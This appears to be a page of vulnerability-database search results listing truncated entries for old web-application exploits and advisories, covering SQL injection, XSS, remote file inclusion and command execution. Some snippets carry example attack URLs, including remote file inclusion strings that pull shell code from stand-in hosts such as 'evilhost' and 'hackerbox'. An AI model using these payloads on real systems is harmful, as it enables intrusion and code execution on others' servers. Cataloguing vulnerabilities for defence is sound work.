
617 matches found

securityvulns
added 2006/04/10 12:0 a.m., 40 views

Sire 2.0 Nws Remote File inclusion & Arbitary Files Upload

by Moroccan Security Team Geetz To All Freind +File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "register_globals" is enabled. lire.php code ? 73...

0.6 AI score
Exploits: 0
exploitpack
added 2006/03/04 12:0 a.m., 12 views

TotalECommerce 1.0 - index.asp?id SQL Injection

TotalECommerce 1.0 - index.asp?id SQL Injection Original advisory: http://www.nukedx.com/?viewdoc=18 Advisory by: nukedx Full PoC Explotation: GET - http://victim/dir/index.asp?secao=PageID&id=SQL EXAMPLE 1 -...

8.7 AI score
Exploits: 0
Packet Storm
added 2006/01/22 12:0 a.m., 31 views

cubecartXSS.txt

CubeCart 3.0.7-pl1 multiple variable Cross site scripting Vendor url: www.cubecart.com bug report:http://bugs.cubecart.com/?do=details&id=459 Advisore:http://lostmon.blogspot.com/2006/01/ cubecart-307-pl1-indexphp-multiple.html. vendor notify:yes exploit avalable: yes I recomended to all vendors ...

7.4 AI score
Exploits: 0
Exploit DB
added 2006/01/03 12:0 a.m., 24 views

INCOGEN Bugport 1.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities

source: https://www.securityfocus.com/bid/16123/info Bugport is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code executed in th...

7.4 AI score
Exploits: 0
NVD
added 2005/12/31 5:0 a.m., 20 views

CVE-2005-4838

Multiple cross-site scripting (XSS) vulnerabilities in the example web applications for Jakarta Tomcat 5.5.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) el/functions.jsp, (2) el/implicit-objects.jsp, and (3) jspx/textRotate.jspx in examples/jsp2/, as demonstrated via...

4.3 CVSS, 7 AI score, 0.07788 EPSS
Exploits: 0, References: 18
exploitpack
added 2005/12/07 12:0 a.m., 22 views

SimpleBBS 1.1 - Remote Command Execution (C)

SimpleBBS 1.1 - Remote Command Execution C / SimpleBBS !--total 188 drwxrwxrwx 2 f1 f1 4096 Dec 6 17:02 . drwxr-xr-x 7 f1 f1 4096 Nov 17 2002 .. -rw-r--r-- 1 f1 f1 916 Oct 20 09:30 WSFTP.LOG -rwxrwxrwx 1 f1 f1 28 Nov 17 2002 categories.php -rwxrwxrwx 1 f1 f1 151 Dec 7 09:11 forums.php -rwxrwxrwx ...

7.7 AI score
Exploits: 0
exploitpack
added 2005/11/28 12:0 a.m., 15 views

Top Music Module 3.0 - SQL Injection

Top Music Module 3.0 - SQL Injection source: https://www.securityfocus.com/bid/15581/info Top Music Module for PHP-Nuke is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query...

8.6 AI score
Exploits: 0
securityvulns
added 2005/11/28 12:0 a.m., 27 views

JBB SQL inj. vuln.

JBB SQL inj. vuln. Vuln. dicovered by : r0t Date: 28 nov. 2005 Orginal advisory:http://pridels.blogspot.com/2005/11/jbb-sql-inj-vuln.html Vendor:http://www.joelh.de/jbb/ affected version: jbb 0.9.9rc3 and prior Vuln. description: Input passed to the "nr" parameter in "topiczeigen.php", "forum"...

0.7 AI score
Exploits: 0
Packet Storm
added 2005/11/20 12:0 a.m., 22 views

revizeSQL.txt

Revizer CMS SQL information disclosure and XSS Vendor url:http://www.idetix.com Advisore:http://lostmon.blogspot.com/2005/11/ revizer-cms-sql-information-disclosure.html Vendor notify: exploit available:yes The Revizer Web Content Management System enables non-technical content contributors to...

7.4 AI score
Exploits: 0
myhack58
added 2005/09/27 12:0 a.m., 38 views

In W2K, elevated several attack instances of success or failure experiences-vulnerability and early warning-the black bar safety net

Speaking of the Virus are related to elevation of Privilege issues, the so-called elevation of privilege is the use of the system loopholes to obtain higher Privilege to. For example, you use the General user account to log on to Windows NT/Windows 2000, You can only make a limited operation,...

7.9 AI score
Exploits: 0
seebug.org
added 2005/08/25 12:0 a.m., 19 views

MS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit

No description provided by source. Name: IIS 5.x and IIS 6.0 Server Name Spoof PoC File:...

7.1 AI score
Exploits: 0
exploitpack
added 2005/08/25 12:0 a.m., 16 views

Microsoft IIS 5.0 - 500-100.asp Server Name Spoof

Microsoft IIS 5.0 - 500-100.asp Server Name Spoof Name: IIS 5.x and IIS 6.0 Server Name Spoof P...

7.4 AI score
Exploits: 0
Packet Storm
added 2005/08/18 12:0 a.m., 23 views

phptbInject.txt

Name: PHPTB Topic Board - Multiple PHP injection vulnerabilities Version = 2.0 Homepage: htt://www.phptb.com/ Author: Filip Groszyński VXSfx Date: 17 August 2005 Background: PHPTB Top...

7.4 AI score
Exploits: 0
securityvulns
added 2005/08/10 12:0 a.m., 43 views

Full path disclosure in CaLogic 1.22 and possible in older versions.

Full path disclosure in CaLogic 1.22 and possible in older versions. Language: PHP Project name: CaLogic Risk: Low Home page: http://www.calogic.de Discovered by: GB & Zetha Explotation examples: http://target/calogic122/doclsqlres.php Fatal error: Call to a member function on a non-object in...

0.1 AI score
Exploits: 0
0day.today
added 2005/06/16 12:0 a.m., 35 views

Ultimate PHP Board <= 1.9.6 GOLD users.dat Password Decryptor

Exploit for unknown platform in category web applications Ultimate PHP Board <= 1.9.6 GOLD users.dat Password Decryptor #!/usr/bin/perl Passwords Decrypter for UPB <= 1.9.6...

7.1 AI score
Exploits: 0
exploitpack
added 2005/05/20 12:0 a.m., 10 views

WebAPP 0.9.9.2.1 - Remote Command Execution (1)

WebAPP 0.9.9.2.1 - Remote Command Execution 1 !/usr/bin/perl T r a p - S e t U n d e r G r o u n D H a c k i n g T e a m Remote C0mmand Executing Expl0it - For WebAPP CGI Exploit By : A l p h a P r o g r a m m e r Sirus-v ; E-Mail : [email protected] [email protected] This xpl Open a...

0.1 AI score
Exploits: 0
Packet Storm
added 2005/04/17 12:0 a.m., 32 views

phpBBupload.txt

Advisory 1 "phpBB Upload Script "up.php" Arbitrary File Upload" $ Author: Status-x $ Contact: [email protected] - [email protected] $ Date: 7 April 2005 $ Website: http://defacers.com.mx $ Original Advisory: http://www.defacers.com.mx/advisories/2.txt $ Risk: High $ Vendor URL:...

7.4 AI score
Exploits: 0
seebug.org
added 2005/03/15 12:0 a.m., 13 views

ZPanel <= 2.5 Remote SQL Injection Exploit

No description provided by source. Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10, remote - in ZPanel 2.0. exploit for v 2.0 http://localhost/zpanel/zpanel.php?page=http://evilhost/shell where http://evilhost/shell.php - evil php code...

7.1 AI score
Exploits: 0
seebug.org
added 2005/03/07 12:0 a.m., 14 views

phpWebLog <= 0.5.3 Arbitrary File Inclusion

No description provided by source. Example: if register_globals=on and allow_url_fopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

7.1 AI score
Exploits: 0
Exploit DB
added 2005/02/28 12:0 a.m., 32 views

PostNuke Phoenix 0.7x - 'SHOW' SQL Injection

source: https://www.securityfocus.com/bid/12684/info PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input. It is reported that issue presents itself when malicious SQL syntax is issued to the application...

7 AI score
Exploits: 0